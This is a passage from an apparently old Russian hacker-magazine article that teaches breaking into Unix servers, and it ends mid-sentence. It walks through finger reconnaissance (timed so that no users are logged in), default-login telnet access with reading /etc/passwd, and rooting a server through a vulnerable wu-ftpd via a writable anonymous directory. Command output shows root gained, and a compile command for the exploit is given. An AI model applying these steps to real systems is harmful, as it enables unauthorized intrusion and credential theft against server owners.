Электронная библиотека
Хакер
Рубрика: Юниксоид
Xakep Online -> Журнал, номер #008, стр. 008-034-2
Посмотрев тип системы и все запущенные на ней демоны, сделаем finger (если открыт 70 порт), чтобы выяснить, присутствуют ли там пользователи и кто именно (лучше всего производить взлом, когда в систему никто не залогинился).
hax0r# finger @lame.****.ru
[lame.****.ru]
No one logged on
Далее можно зателнетиться на сервер на 23 порт и проверить логины по умолчанию (звучит, конечно, по-ламерски, но часто это срабатывает, и не только на левых серваках).
IRIX System V.4 (lamo)
login: lp
IRIX Release 5.3 IP12 lamo
Copyright 1987-1994 Silicon Graphics, Inc. All Rights Reserved.
$ cat /etc/passwd
Теперь проверяем версии демонов, возможно, некоторые - старье, тогда можно воспользоваться удаленными эксплоитами. Для этого телнетимся на открытые порты:
ХХХХХХХХХХХ ВРЕЗКА ХХХХХХХХХХХ
Порты:
port 21: ftp port 110: pop3 port 514: shell
port 23: telnet port 111: portmap port 515: printer
port 25: smtp port 143: imap port 6000: (X)
port 37: time port 512: exec
port 79: finger port 513: login
ХХХХХХХХХХХХХХХХХХХХХХХХХХХХ
hax0r# ftp ftp.****.ru
Connected to satan.****.ru.
220 satan.****.ru FTP server (Version wu-2.4.2-academ[BETA-18](1) Mon Jan 18
19:19:31 EST 1999) ready.
Name (ftp.****.ru:hax0r): ftp
331 Guest login ok, send your complete e-mail address as password.
Password: mal@xakep.ru
ftp> ls -l
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 8
dr-x------ 7 ftp ftp 1024 Jul 13 08:02 .
dr-x------ 7 ftp ftp 1024 Jul 13 08:02 ..
dr-xr-xr-x 2 root root 1024 Feb 25 16:34 bin
d--x--x--x 2 root root 1024 Feb 25 16:34 etc
dr-xr-xr-x 2 root root 1024 Feb 25 16:34 lib
dr-xr-xr-x 11 root root 1024 Feb 9 1998 pub
drwxrwxrwx 2 ftp ftp 1024 Jul 9 13:33 incoming /* можно писать то, что надо */
-r--r--r-- 1 root root 605 Jul 16 1998 welcome.msg
226 Transfer complete.
ftp>
Мы видим, что на сервере установлена дырявая версия wu-ftpd. Это может быть использовано для того, чтобы зарутить сервер.
hax0r#./wu ftp.****.ru /incoming
Linux satan #1 Fri Feb 6 21:58:32 JST 1998 i686 unknown
uid=0(root) gid=0(root) groups=0(root)
Вот мы и получили права рута используя баг в этом сервисе ftpd, применив к нему программу-exploit wu (кстати, запускать файлы в Юниксе или на шелле нужно прописывая в начале файла "./"). Эксплоит можно найти в поисковых системах или на специализированных серверах, посвященных безопасности. Но там ты найдешь код программы на языке C, поэтому подробное описание того, что происходит при запуске эксплоита, описывать не буду. А если интересно, подучи язык C и попробуй разобраться сам. Откомпилить ее можно используя встроенные в Линукс компилеры gcc или cc. (hax0r# gcc -o wu wu-ftpd.c).
Вот еще один пример использования бага в демоне mountd, установленном на Линуксе. Mountd всегда находится на разных портах (чтобы применить эксплоит, нужно знать те порты, на которых висит демон), и найти их можно посредством вот такой команды: